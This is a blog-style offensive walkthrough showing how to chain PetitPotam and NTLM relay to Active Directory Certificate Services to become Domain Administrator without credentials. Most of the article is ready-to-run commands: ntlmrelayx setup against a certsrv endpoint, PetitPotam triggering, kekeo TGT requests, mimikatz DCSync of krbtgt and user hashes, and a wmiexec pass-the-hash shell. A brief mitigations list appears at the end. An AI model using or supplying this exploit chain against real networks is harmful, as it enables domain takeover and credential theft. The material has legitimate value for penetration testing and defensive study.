From Stranger to DA // Using PetitPotam to NTLM relay to Domain Administrator

Knock knock, who’s there? Your new DA!

Several vulnerabilities that have been recently disclosed, namely:

  • MS-EFSRPC – AKA PetitPotam
  • Credential Relaying abusing the AD CS role

Any attacker with internal network access, such as a phished client or a malicious planted device in the network, can take over the entire Active Directory domain without any initial credentials. Domain Controllers and AD CS is vulnerable to this attack currently in the default configuration.

When PetitPotam is exploited and NTLM credentials are relayed to Active Directory Certificate Services, an attacker can obtain Domain Administrator privileges without any prior authentication to the domain. This article will detail the steps necessary for exploitation, followed by some words on mitigations for PetitPotam.

An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.

AD CS (Active Directory Certificate Services) is particularly interesting as it offers role services that by default accept NTLM based authentication. These services specifically include Certificate Authority Web Enrollment and the Certificate Enrollment Web Service.

Demo Video

Steps

  1. Use PetitPotam to trigger NTLM authentication from the Domain Controller to the Listener (Running Responder or ntlmrelayx)
  2. Use ntlmrelayx to relay the DC’s credentials to the AD CS (Active Directory Certificate Services) server with Web Enrollment enabled (NTLM auth must be enabled and is enabled by default), using the “KerberosAuthentication” or “DomainControllers” AD CS template.
  3. Obtain Base64 PKCS12 Certificate Obtained through NTLM relaying
  4. Use the Base64 PKCS12 cert to import to Kekeo to ask for a TGT (Ticket Granting Ticket)
  5. Use mimikatz to dump LSA secrets for the user of choice (Administrator, Krbtgt etc)
  6. Note down the NT hash from the domain administrator user
  7. Use wmiexec to gain execution as that user against the Domain Controller and perform Pass-The-Hash of the NT hash
  8. ???
  9. Profit! You’re DA!

Step 1-3 – Exploit PetitPotam and Relay to Active Directory Certificate Services

Before you can exploit PetitPotam (MS-EFSRPC), you need to setup ntlmrelayx to catch and relay to the AD CS server. In this example we’re going to be using the KerberosAuthentication AD CS template, however, we could have also used the DomainControllers template.

git clone https://github.com/ExAndroidDev/impacket.git # Clone the custom ntlmrelayx repo
cd impacket
git checkout ntlmrelayx-adcs-attack # checkout to the right branch - this caught me out
sudo pip3 uninstall impacket # Uninstall the old impacket so there aren't any conflicts
sudo pip uninstall impacket
sudo pip3 install -r requirements.txt
sudo python3 setup.py install # install this version of impacket with the adcs flag

sudo python3 ntlmrelayx.py -debug -smb2support --target http://pki.lab.local/certsrv/certfnsh.asp --adcs --template KerberosAuthentication # start the relay - change pki.lab.local to the domain name of your ADCS Server
petitpotam ntlm relay poc - ntlmrelayx.py relay to AD CS
ntlmrelayx.py relay to AD CS

Now that ntlmrelayx is waiting, trigger NTLM authentication through PetitPotam. (Note, there are several other ways to trigger NTLM authentication, including: Responder, mitm6, PrinterBug, PrintNightmare etc). This will cause the DC to authenticate with the relay listener and relay NTLM credentials to the AD CS server.

Use PetitPotam to trigger NTLM authentication from the Domain Controller against the Listener (Running Responder or ntlmrelayx)

git clone https://github.com/topotam/PetitPotam
cd PetitPotam/
sudo pip3 install -r requirements.txt
python3 Petitpotam.py <listener> <target (DC)>
# In this case, your listener is your relay IP, and the target is the IP of the domain controller you're targeting
petitpotam ntlm relay poc - Exploiting PetitPotam against the domain controller to trigger NTLM authentication
Exploiting PetitPotam against the domain controller to trigger NTLM authentication

Step 4-6 – Obtain a TGT with the Base64 PKCS12 Certificate enrolled to AD CS

Take the Base64 PKCS12 certificate which is now enrolled to AD CS (Active Directory Certificate Services) and import it to Kekeo to obtain a TGT (Ticket Granting Ticket). An attacker can also use Rubeus to perform this step

Example Demo by Benjamin Delpy

Below is a short demo example from Benjamin Delpy / Gentilkiwi on exploitation using Kekeo & Mimikatz to exploit PetitPotam & Dump LSA.

petitpotam ntlm relay poc - Demo from Benjamin Delpy of Exploitation of MS-EFSRPC
Demo from Benjamin Delpy of Exploitation of MS-EFSRPC
  • Use Kekeo to ask for a TGT from pkcs12 Base64 certificate obtained through ntlmrelaying
  • Use mimikatz to dump LSA secrets
curl https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20210723/kekeo.zip -o kekeo.zip
tar -xf .\kekeo.zip
.\x64\kekeo.exe
base64 /input:on
tgt::ask /pfx:<base64 cert from relay> /user:dc-101$ /domain:spencer.local /ptt
exit

curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip -o mimikatz.zip
tar -xf mimikatz.zip
.\x64\mimikatz.exe
lsadump::dcsync /domain:spencer.local /user:krbtgt #&nbsp;note down the ntlm hash
lsadump::dcsync /domain:spencer.local /user:<any user>
exit
petitpotam ntlm relay poc - Obtaining a TGT via the PFX Base64 certificate
Obtaining a TGT via the PFX Base64 certificate
Performing a dcsync against the domain controller with the obtained TGT

Step 7 – Pass-The-Hash of the NT hash of the target User

Use the NT hash of the target user to gain execution through WMI.

wmiexec.py -hashes :9815c330fd6ce34663a2e7a5f0444848 spencer/op@10.0.0.18
Obtaining interactive shell via wmiexec.py using PTH (Pass-The-Hash)

Conclusion

These two bugs chained together allow for instant escalation from low privilege user to domain administrator in a matter of minutes. This is a devastating bug that at the time of writing will work on a fully patched domain controller and active directory certificate services setup.

Mitigations

This article will not go into deep detail regarding mitigations as Hasain has already written a very extensive article on mitigations for PetitPotam and preventing the capture of NT hashes, this can be found here.

  • Remove the listed role services if not justified by a business need. In most of the cases the affected services are replaceable by other API/interfaces such as the built-in RPC interfaces.
  • Restrict/disable inbound NTLM authentication to the server running the role service by setting the policy “Network security: Restrict NTLM: Incoming NTLM traffic”.
  • Disable/remove the NTLM provider in the Internet Information Services (IIS) running the selected role services.

Links & Further Research

Furthermore in-depth reading on this topic and the theory behind it can be found below: